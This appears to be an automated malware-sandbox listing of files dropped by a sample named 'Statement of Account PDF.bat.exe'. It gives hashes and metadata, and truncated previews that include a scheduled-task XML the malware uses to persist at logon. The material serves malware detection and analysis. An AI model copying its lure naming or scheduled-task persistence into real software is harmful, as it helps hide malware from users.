                                                      SSDEEP:192:A+lB/n9+0Wbk9aGOJo1ZrFmCozuiFxZ24IO87:RpnfWbk9ah1DzuiFxY4IO87
                                                      MD5:22425F011EE5D1D2BDBD23A46D7FFC03
                                                      SHA1:1B709DBFF1EFC0887DA605E47356819E8CA367E6
                                                      SHA-256:A3EAF2A0F48042F92E3FBBF2DC0327F93CB453FC909DD15AC48F4C3374021DEE
                                                      SHA-512:82CEA5F34241A5164978F36C70C96204B4C5A904F7D938E35CC92A5AB81838FB66B86A812D2900E5DB9B3EC813FAE7EE02C9ADA5570C61EC588BB4915DC71C5F
                                                      Malicious:false
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):1.2772764358652007
                                                      Encrypted:false
                                                      SSDEEP:192:kmGV/T9+0Wbk9ayU+myZr07ptzuiFgZ24IO87:pGFTfWbk9a7FjzuiFgY4IO87
                                                      MD5:F44AC2F4A44A07012BAA8F3EC782F63C
                                                      SHA1:C34CF51938DC53EDF48124A09AE0B60C502AD1D6
                                                      SHA-256:5D7744177B4B5CF1CC0B0F5CDB4CEC5D788ABE70BEE58213318BF435A9E49614
                                                      SHA-512:262F198AB0674C530553F65256871E26186C570C0C33AC126B532328B0CC0A0909495CF8867133471C0D8D0D96416DCBB6900288C16AD3CB6F48039F428B24F0
                                                      Malicious:false
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):1.2882566430890479
                                                      Encrypted:false
                                                      SSDEEP:192:OrpvXMp+0WbkNauOJo1ZrFmCjkzuiFgZ24IO8kn:IvMrWbkNap1gkzuiFgY4IO8k
                                                      MD5:3AD43F30EC2A54F891CB1CF16EF05701
                                                      SHA1:CA106098A54EC28F039FAAF351716D8F14E1686D
                                                      SHA-256:0B56D7AD9FD97ACD42B690E84594FBD4DF5E1E4BBCE645275AB1704D22EF6D05
                                                      SHA-512:05044E1BB36F2C3A7BD87FB6F49395F8778A44F15985A5076467F87B8A6CF246964C575CE5A1FF565BD3A7D72A52DB26483A158D28A3BAD59A48DE8F2DDD845B
                                                      Malicious:false
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4736
                                                      Entropy (8bit):4.459056297565655
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwWl8zs1Jg77aI9t6WpW8VYkYm8M4JdS2yFD++q8vqS29/NNPLSDd:uIjfPI7L77VsJxKs//zSDd
                                                      MD5:FAAFD1345CE621FE7FE244DDC4652D11
                                                      SHA1:18170FC6E098EDA119CCA1407AC3DA462C951B47
                                                      SHA-256:945A3AE7BF519B317A686FE782124D145881A7EB4C3708AE161348E0BA5D45A4
                                                      SHA-512:E1BB8616D25A65981AFDAFEC1692975E454E119A88534D35AD23527DAFD7A5591ACB98DFB64729C6B1F56EDC492F2882A7CE03104C9BF77640BE1E2BE2E1BDE0
                                                      Malicious:false
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Mini DuMP crash report, 15 streams, Fri Apr 26 08:33:13 2024, 0x1205a4 type
                                                      Category:dropped
                                                      Size (bytes):242199
                                                      Entropy (8bit):4.534388695167162
                                                      Encrypted:false
                                                      SSDEEP:3072:ClR+U4uEqMQPbEDLTguhWy8E4OBqqWxYTqP:ClIU4lQPbsTgucy8LXYo
                                                      MD5:080662EE6631655199D65F68221C6D94
                                                      SHA1:0B4BBA1A5F9B1F96DA49646B5EC1762068D1E461
                                                      SHA-256:9EA784CEEC5BE4531E3D0CF3941C13509FC2004E90E2DDB7DB3B3153E1ABBED6
                                                      SHA-512:5DB37387AF8F29AAC7C97D93B5EB2C9DC6668B21D35F451923DB7FEF17D6FBFE8A2AB29A31C443F5E864641A09864168F034661A4A489289702E583E1AE8E3A7
                                                      Malicious:false
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8400
                                                      Entropy (8bit):3.684054244990612
                                                      Encrypted:false
                                                      SSDEEP:192:R6l7wVeJns69rUG6Y91SU9S3ongmfZivprc89bM5sfTEm:R6lXJs69rV6YvSU9S3AgmfY7MSfV
                                                      MD5:CE15E1E6FB4A96EA97EEB3B524CD757F
                                                      SHA1:572D2F9B9AFFA4626ACD540FC407078648F99605
                                                      SHA-256:6CB860F036EF7FB60332AA5F4701A9D75C94104C8F6D5E8B0E3568F25D2C2F35
                                                      SHA-512:EFF4845D78F316FF557FC5617DBC010AB788A56C574B7E35E9CDDA5C695E1069200415494841394FCABC269B66E55BE463091DCBFE56A2B347FE2F6C5BFCF878
                                                      Malicious:false
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4721
                                                      Entropy (8bit):4.456323326510158
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwWl8zs1Jg77aI9t6WpW8VYqYm8M4JjegS2yFvVP+q8v5gS280NNPiSfSXd:uIjfPI7L77VqJjepPK5a/KSfSXd
                                                      MD5:375DB68D7B1CC703F2F0502DF0142728
                                                      SHA1:EDDA5F9F7F21E22EAC086EAEEF8D2B7AEE12AD5B
                                                      SHA-256:07314E2787F612BE31A782C1EB97D36D887B7EA101FE71B344B9F19E14642D8A
                                                      SHA-512:3FD5D502F8B9EC0C2DFF70FB9C832CDC6F2A2B382B8A0822DEE6925DA2AD7B5D0FD1308C0891C3B901FC61D36C66CFB557D72DEDB90222D9930871E666871FEB
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="296615" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Mini DuMP crash report, 15 streams, Fri Apr 26 08:33:21 2024, 0x1205a4 type
                                                      Category:dropped
                                                      Size (bytes):241565
                                                      Entropy (8bit):4.52679090454485
                                                      Encrypted:false
                                                      SSDEEP:1536:JYaDO7KNuBojRwpN4uE2aOFdE7BLTgOoprZy59SVXNekxAcNtWdWCD4VBtT/LvLN:Jrm4uEq/EFLTgPrQzy9dA4dvjfvQQTj
                                                      MD5:7740E6B901C4694A63A280BB49964454
                                                      SHA1:B75D32A1A908290432BE7AEA7CDA778B3D93C880
                                                      SHA-256:4B286F48A92715C79E5D8A0B9B516E2B392E78C291A9C1D4ABA8C4D8EF02CC74
                                                      SHA-512:E4457D2574271EBA3092867B0F2DFE8CE793D1AB5B36143FACDA6D7F05D3FE8F96B0F85D36229DE3F9D820F9EE2966D21CFC8A543D02F72196DC1AB4CFC48F7A
                                                      Malicious:false
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8400
                                                      Entropy (8bit):3.683470550398823
                                                      Encrypted:false
                                                      SSDEEP:192:R6l7wVeJdn6qle6Y9vSU9N3MgmfZivprg89b9WsfScfm:R6lXJN6qle6YFSU9N3MgmfYP91fSZ
                                                      MD5:283742E8C860E5EFFCB9D7DCAF60B47C
                                                      SHA1:9BE7D371B03F81BAB383622933A865EBD30D84A4
                                                      SHA-256:4025B984AC9D176678D53D1BED21BDA6970D02BAC5D075E8EBD9561538586FA3
                                                      SHA-512:CC795158676A45E01858AA8B350F1E096C4961E64BBEF5E587E20578AAE786EC5E698D4A3E6911B481A93AE2125B92F19BC41BF036575EBAFBDFA33D390D5B05
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>...<OSVersionInformation>....<WindowsNTVersion>10.0</WindowsNTVersion>....<Build>19045</Build>....<Product>(0x30): Windows 10 Pro</Product>....<Edition>Professional</Edition>....<BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>....<Revision>2006</Revision>....<Flavor>Multiprocessor Free</Flavor>....<Architecture>X64</Architecture>....<LCID>2057</LCID>...</OSVersionInformation>...<ProcessInformation>....<Pid>7400</Pi
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4721
                                                      Entropy (8bit):4.45504601655123
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwWl8zskJg77aI9t6WpW8VYtvYm8M4JjegS2yFTY6E5j+q8v5gS2cSNNPiSfSS:uIjfiI7L77V9JjeI6E5jK5PS/KSfSsd
                                                      MD5:7E9EEAED225228C9F2553FC90A5B00AD
                                                      SHA1:E8F8B332BAE0433E06FB210265B5F9F1F0C2E226
                                                      SHA-256:4AA5DC1EC1881B4D446BE3C5BEFBF90491FA52DDF205F8403512136743B2CF0C
                                                      SHA-512:9D6D3962118EE9EDEB0BB252F1F953D7B438F21F3D5E1BADA918272BCFB0AAF05ECCB793B55763ADCDD64BA3B99B3601EB9FF8516DD549C2DBFBB3672625E4EF
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="296616" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):6386
                                                      Entropy (8bit):3.6994495792577573
                                                      Encrypted:false
                                                      SSDEEP:96:RSIU6o7wVetb1r61YZ+Vn7EgaM4Un89byFsf22HGm:R6l7wVeJ1r61YZ+vprn89byFsfvmm
                                                      MD5:8CDC796D862160F853DF372A1F31B94B
                                                      SHA1:908D9D031B799570ED8605E8EA69BC92E5283A34
                                                      SHA-256:A2854D3EFB5B7A24B3CC59BC1BFE207070808B11F13CC82D5580C43F616EB37B
                                                      SHA-512:77BE2F2AE2AC71CF9DD7E5706EB4B755466D09D809196F421A53855F84BADC7BF3B9B2E98383801DE8A42C6FEC65ED72A8C40AC5631A11429947DC5FB148D5D7
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>...<OSVersionInformation>....<WindowsNTVersion>10.0</WindowsNTVersion>....<Build>19045</Build>....<Product>(0x30): Windows 10 Pro</Product>....<Edition>Professional</Edition>....<BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>....<Revision>2006</Revision>....<Flavor>Multiprocessor Free</Flavor>....<Architecture>X64</Architecture>....<LCID>2057</LCID>...</OSVersionInformation>...<ProcessInformation>....<Pid>7440</Pi
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Mini DuMP crash report, 15 streams, Fri Apr 26 08:33:04 2024, 0x1205a4 type
                                                      Category:dropped
                                                      Size (bytes):242961
                                                      Entropy (8bit):4.5052908898061155
                                                      Encrypted:false
                                                      SSDEEP:3072:nLLU4uEqoEoLTgHsbQpyAwiLesovQ436DKR:nLLU4zLTgMbQpyrvvD32K
                                                      MD5:0E31274DABC416C3C4FC90269CEFBE2C
                                                      SHA1:B7C41643B2DE9CBD55C6B9C460ADF6D1658F682E
                                                      SHA-256:5EDD73084ED5A40639CAE3E1376E9C225BAC2F7DF9CE55B80F6D3401CF368F0E
                                                      SHA-512:B291E9088F833DE41D61CE1B9E478FB3CFA715EF943FCF77E99C25D036E86A52C27454F41CA761B88824E01F590798FC6F46BAADC043EA1E211830AE04D0004C
                                                      Malicious:false
                                                      Process:C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:modified
                                                      Size (bytes):1216
                                                      Entropy (8bit):5.34331486778365
                                                      Encrypted:false
                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                      Malicious:false
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                      Process:C:\Users\user\Desktop\Statement of Account PDF.bat.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:modified
                                                      Size (bytes):1216
                                                      Entropy (8bit):5.34331486778365
                                                      Encrypted:false
                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                      Malicious:false
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                      Process:C:\Users\user\AppData\Roaming\gDdsxauPhk.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:modified
                                                      Size (bytes):1216
                                                      Entropy (8bit):5.34331486778365
                                                      Encrypted:false
                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                      Malicious:false
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):2232
                                                      Entropy (8bit):5.380192968514367
                                                      Encrypted:false
                                                      SSDEEP:48:+WSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZeUyus:+LHyIFKL3IZ2KRH9Ougos
                                                      MD5:DFB938AC479D63575631BF9D1D7CEC60
                                                      SHA1:F42EBC6B0B4823B8600DC05237BDBCBA940C3CF1
                                                      SHA-256:38298BB292A779EA5009599691C03E780306D6E52CDA6A26AFA339F31FB2870D
                                                      SHA-512:F58116AE16C58A04775F0EB7992F7187805FA279461781311E018379C5AC383B75B72AE768CAB888919125D6EBFB83FAAD8811CE72867852A90832F82A79C7DE
                                                      Malicious:false
                                                      Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Users\user\AppData\Roaming\gDdsxauPhk.exe
                                                      File Type:XML 1.0 document, ASCII text
                                                      Category:dropped
                                                      Size (bytes):1576
                                                      Entropy (8bit):5.107376380597849
                                                      Encrypted:false
                                                      SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtasxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTxv
                                                      MD5:9D7F39C8E0667388818F45A197737E62
                                                      SHA1:53D78BAF1CB57A444E85767F3641A792A62B3295
                                                      SHA-256:972C48F606DF7A57676FD06674BDE849337270E4FC65AFECA873504C712B336C
                                                      SHA-512:D1B65497DFADAA90A14B2C4D5E87E9941AC41718B9A6AACEA23BA73319F47C90AAEDE32B2323A36B69498ABCE1E4F7A1EF2BD87F3D5AF3BC5DFF3F2757CB2EE2
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                      Process:C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                                                      File Type:XML 1.0 document, ASCII text
                                                      Category:dropped
                                                      Size (bytes):1576
                                                      Entropy (8bit):5.107376380597849
                                                      Encrypted:false
                                                      SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtasxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTxv
                                                      MD5:9D7F39C8E0667388818F45A197737E62
                                                      SHA1:53D78BAF1CB57A444E85767F3641A792A62B3295
                                                      SHA-256:972C48F606DF7A57676FD06674BDE849337270E4FC65AFECA873504C712B336C
                                                      SHA-512:D1B65497DFADAA90A14B2C4D5E87E9941AC41718B9A6AACEA23BA73319F47C90AAEDE32B2323A36B69498ABCE1E4F7A1EF2BD87F3D5AF3BC5DFF3F2757CB2EE2
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                      Process:C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                                                      File Type:XML 1.0 document, ASCII text
                                                      Category:modified
                                                      Size (bytes):1576
                                                      Entropy (8bit):5.107376380597849
                                                      Encrypted:false
                                                      SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtasxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTxv
                                                      MD5:9D7F39C8E0667388818F45A197737E62
                                                      SHA1:53D78BAF1CB57A444E85767F3641A792A62B3295
                                                      SHA-256:972C48F606DF7A57676FD06674BDE849337270E4FC65AFECA873504C712B336C
                                                      SHA-512:D1B65497DFADAA90A14B2C4D5E87E9941AC41718B9A6AACEA23BA73319F47C90AAEDE32B2323A36B69498ABCE1E4F7A1EF2BD87F3D5AF3BC5DFF3F2757CB2EE2
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                      Process:C:\Users\user\Desktop\Statement of Account PDF.bat.exe
                                                      File Type:XML 1.0 document, ASCII text
                                                      Category:dropped
                                                      Size (bytes):1576
                                                      Entropy (8bit):5.107376380597849
                                                      Encrypted:false
                                                      SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtasxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTxv
                                                      MD5:9D7F39C8E0667388818F45A197737E62
                                                      SHA1:53D78BAF1CB57A444E85767F3641A792A62B3295
                                                      SHA-256:972C48F606DF7A57676FD06674BDE849337270E4FC65AFECA873504C712B336C
                                                      SHA-512:D1B65497DFADAA90A14B2C4D5E87E9941AC41718B9A6AACEA23BA73319F47C90AAEDE32B2323A36B69498ABCE1E4F7A1EF2BD87F3D5AF3BC5DFF3F2757CB2EE2
                                                      Malicious:true
                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                      Process:C:\Users\user\Desktop\Statement of Account PDF.bat.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):709632
                                                      Entropy (8bit):7.947855789155266
                                                      Encrypted:false
                                                      SSDEEP:12288:lYIPXj/PqfEKyBVaLXKfjJUKJepONj9BtjWVpFZt/DAjB4Bd:lYIPesVaLXKnJeAj9BtqzFHiWX
